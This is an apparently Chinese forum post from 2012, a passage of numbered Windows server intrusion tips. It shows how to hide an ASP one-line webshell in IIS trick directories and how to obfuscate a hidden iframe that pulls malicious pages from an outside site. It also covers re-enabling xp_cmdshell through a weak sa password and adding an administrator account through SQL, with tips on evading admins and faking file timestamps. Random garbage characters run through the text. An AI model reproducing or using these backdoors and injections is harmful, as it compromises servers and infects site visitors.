6 F! K6 R. e# {' ~1 |, B4 \2 U5 s6 e用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。. m9 V& t3 d- Y+ a" X7 L
' \$ E& e" k/ @53、隐藏ASP后门的两种方法
, b' W; T0 I9 B a* t( f1、建立非标准目录:mkdir images..\- m/ e. \: m$ u) Y* x. ^
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp o! l' U# {& q" F" N# p
通过web访问ASP木马:http://ip/images../news.asp?action=login$ J! I3 C" t& u) F3 i/ X; U
如何删除非标准目录:rmdir images..\ /s7 M/ {+ B5 N! D4 w+ w
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:% R& a& ^6 f( h8 {2 J9 m
mkdir programme.asp
0 u- K/ j4 ]: T' g( o+ ]新建1.txt文件内容:<!--#include file=”12.jpg”-->
) A* Y V- r/ m7 r: L$ H" i新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件! {9 ]' C. C* C+ s& S
attrib +H +S programme.asp
* N/ Z# S+ ]2 z9 g通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt7 H3 [0 \" H0 Q
% M$ ~: i1 W8 r/ p/ e7 ~
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。% H4 k' _ h8 e7 I
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。+ h8 k- W1 F! H8 y/ v0 f- i
6 X" S5 G% m, F2 k+ m# G# C
55、JS隐蔽挂马
& a0 Y) G5 @& Z/ O. X1.) p2 H" m: x/ C% H: }5 V, n) y
var tr4c3="<iframe src=ht";$ `( k a6 O- u I( C
tr4c3 = tr4c3+"tp:/";
8 }- ]! C1 z, Ctr4c3 = tr4c3+"/ww";
% z _8 u( {& i1 k: ]tr4c3 = tr4c3+"w.tr4";
# T( p! @; z- A) t3 z! Vtr4c3 = tr4c3+"c3.com/inc/m";
; g& U: r" [' Ztr4c3 = tr4c3+"m.htm style="display:none"></i";2 E v4 K; ]3 e; c& x3 B6 k
tr4c3 =tr4c3+"frame>'";
+ e$ X; k+ K$ V% o) q$ L- @document.write(tr4c3);$ m' F- s, O3 }; h$ `+ B& E0 I+ x
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 \0 e, I7 x$ k! ^6 N, C E4 X, g, L! [
2.
2 F4 x) J. S/ Z+ Y* D1 D- _6 d% k4 h9 ~转换进制,然后用EVAL执行。如/ ]5 Q, U1 F& P6 x% u4 q
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");% B% c! B1 l! V, g
不过这个有点显眼。
9 x- F! Y! M T$ g& P- E3.
" y/ c: _$ C+ W$ w! Xdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
4 l' L' [/ F, S4 t, i2 I1 q最后一点,别忘了把文件的时间也修改下。
: N! n; {" Y0 g1 ?% M" ?2 [* n, }- B& K
56.3389终端入侵常用DOS命令
l2 l6 T0 y$ J- L& x* j a6 J6 m' m" {taskkill taskkill /PID 1248 /t
) \9 l9 T1 d$ [. b5 {; f9 s
- j- U. }% m5 ^- _tasklist 查进程
( G. B8 x( C6 z5 _! T/ e0 K! m
; s6 }2 y9 j+ r5 Vcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限6 l5 n( y6 _8 z5 F8 Z
iisreset /reboot5 i* o5 u: m* b0 t b( K
tsshutdn /reboot /delay:1 重起服务器) ^# \$ ~! l. o% {4 e8 g. ]2 w
5 J* `8 s+ \2 T! v
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,. F4 C7 P7 s B9 P; _& l
: P) @+ Q: M+ S9 l& O! C
query user 查看当前终端用户在线情况
; p8 p! e( w; Y+ X8 K& Z0 |" ~, `4 R
要显示有关所有会话使用的进程的信息,请键入:query process *; q* O h. c- U5 B9 q* J/ S: |
h# y2 [2 o+ w" X$ p) B/ t) m7 L要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:28 ~) ]" s, z% _
0 X! `$ \1 s* A; q/ K
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2, v2 x* x6 `' I
8 }5 T/ i. P2 \* u2 A8 Q要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02/ p" l' _- k, h( G5 W8 ?/ S
u* D2 i( r' e0 a- l( z命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
- ?; h8 j7 B* p" g( h7 T
! w3 ?- v, x1 h命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
( N6 u2 a0 S# V, @% ^% S
: y) ?$ Q! B" D9 \命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
7 Z' y- j9 r) ~3 O/ v
/ F8 D0 ?8 U& Q) r3 g+ f/ _4 u( G命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机0 p5 N3 |, L' S! K& P' K$ W, e6 T
_1 {8 S& M7 r; R: \' C
56、在地址栏或按Ctrl+O,输入:% h8 g* D* h, V
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
{, W9 [3 t& P" F
[! i- o ~) {# n1 j源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
6 U/ h% `# q) C5 {: z, \8 P9 h2 R2 D$ a0 V9 s b6 n+ {
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
" x1 H- J j; ^( H用net localgroup administrators是可以看到管理组下,加了$的用户的。
- J! s# @7 N$ ?; R
: Q/ e! P7 j, e58、 sa弱口令相关命令
5 R: Q1 \5 _5 R7 q2 `! t$ M4 u
2 E1 Q6 F% F2 r& P/ R7 [2 B一.更改sa口令方法:
4 j3 ]! I7 [4 X( L用sql综合利用工具连接后,执行命令:; c* S, t, H; d! {% F! U6 Y
exec sp_password NULL,'20001001','sa'
. Z8 O& ?- N+ M* A6 K9 r; f, Z- D(提示:慎用!)
# k6 g, E$ @# s. K0 ~$ K( R& K* i
二.简单修补sa弱口令.9 j3 }- i7 t8 M5 A& l0 V3 Y8 O
5 Y7 \$ j+ R% g* W
方法1:查询分离器连接后执行:
9 I6 w! m1 r! w" cif exists (select * from
7 j' _; m% L5 s* J: K9 A) ^* jdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
) h; o: G- r& s! n2 f4 ZOBJECTPROPERTY(id, N'IsExtendedProc') = 1)2 y3 Y$ @: B1 }8 ~
5 j1 l( H$ b/ U/ D) f
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
& Y9 Q& p4 p5 [1 U: h
9 m0 Q1 ]4 n: aGO+ o, D7 \' t [, R, S3 {* c
0 @' A" r! y4 H& I- L4 e然后按F5键命令执行完毕
/ E- W$ \" ~5 k2 U4 ~
3 Y- S# e: y, x& ]" _8 B3 v方法2:查询分离器连接后. ]0 P. I* n) }1 w
第一步执行:use master
* Q' m+ o9 d9 n& N' g( u. ^7 e. T第二步执行:sp_dropextendedproc 'xp_cmdshell'* t1 g4 a7 J! o- K: ]+ x6 {$ d
然后按F5键命令执行完毕
2 S- u7 `9 j6 }" }6 `7 k% z8 Q" h/ F6 {* y
# X7 n( w8 P. T) v3 I* [
三.常见情况恢复执行xp_cmdshell.) q8 S! z" n( L4 T& e* B
, i8 F+ _$ G5 z4 S$ Z
$ f, ]1 Y$ K* j
1 未能找到存储过程'master..xpcmdshell'.
9 m* L7 t- o' i 恢复方法:查询分离器连接后,
z9 u$ l4 v7 I& Q$ g: d第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int6 q6 ]: c- Y# i4 R, R
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'% q6 r) \- R% d$ K q' r
然后按F5键命令执行完毕; g- d4 D. O3 [3 B$ _4 U z
' t7 x% C( n5 O7 M- P7 Z9 S
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
. y c5 P o. h8 U) v( z/ s$ p恢复方法:查询分离器连接后,1 S5 t) L3 K, O2 Z
第一步执行:sp_dropextendedproc "xp_cmdshell") w! N4 \4 Z _+ ~3 z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( w7 G" K% k$ z8 H2 m, F- ^+ d然后按F5键命令执行完毕
0 h- F. z$ H( {5 V- I. S3 Q% P) |( [( B( @' c
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
' E7 }( Z3 q, Y" j& |5 b9 Y' W, @1 j0 {恢复方法:查询分离器连接后,$ t$ ] O8 E6 U: p1 C$ ~, U. c- f
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'& H: `* f7 \: m& u
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ( b# S3 l& A# l0 h
然后按F5键命令执行完毕
3 F2 v' v4 X; A8 D
+ }! n1 U k) H2 U5 g' \四.终极方法.
\' U4 ~, Z. A! M如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:4 F/ J! e2 w+ }9 ?' i# I
查询分离器连接后,
/ m) {8 D: D- N" {* V$ w' D$ y1 Z2000servser系统:
8 z: D+ ?& }4 a" j% |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'2 E( k8 {, k- p
2 M7 G! ~( s' k+ B. u
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add', N6 v) C: l6 T' s
2 \6 t7 E, m7 b/ }3 s, {! jxp或2003server系统:
+ x+ A8 o& n* Q3 f& T( l/ b$ r- t4 f9 u9 [$ Z* C8 L$ g& {6 {4 n1 ~6 Z" K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'6 Q; F; h2 K S8 E4 Y
8 b! p% K, m; m! U ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
% G2 J+ ^9 n8 S+ g5 |1 k; ? |
发表于 2012-9-15 14:51:03
收藏
支持
反对